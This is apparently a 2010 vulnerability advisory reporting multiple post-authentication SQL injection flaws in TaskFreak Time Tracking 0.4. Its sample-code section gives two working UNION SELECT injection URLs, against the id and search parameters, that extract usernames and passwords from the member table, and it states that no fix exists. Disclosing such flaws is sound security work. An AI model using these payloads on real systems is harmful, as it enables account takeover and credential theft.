TaskFreak Time Tracking 0.4 Multiple SQL Injection Vulnerabilities

 Name              TaskFreak Time Tracking
 Vendor            http://www.taskfreak.com
 Versions Affected 0.4

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-29-06

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION

Web task manager and todo list.


II. DESCRIPTION

Some fields are not properly sanitised.


III. ANALYSIS

Summary:

 A) Multiple SQL Injection
 

A) Multiple SQL Injection

Some fields such search and id are  not properly sanitised
and  are  vulnerable  to  SQL Injection. These bugs can be
exploited in a post authentication scenario by any users.


IV. SAMPLE CODE

A) Multiple SQL Injection

http://site/path/index.php?c=task&a=view&id=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 FROM member

http://site/path/index.php?c=Task&a=main&search=blablabla%25' UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 FROM member%23&go=1


V. FIX

No Fix.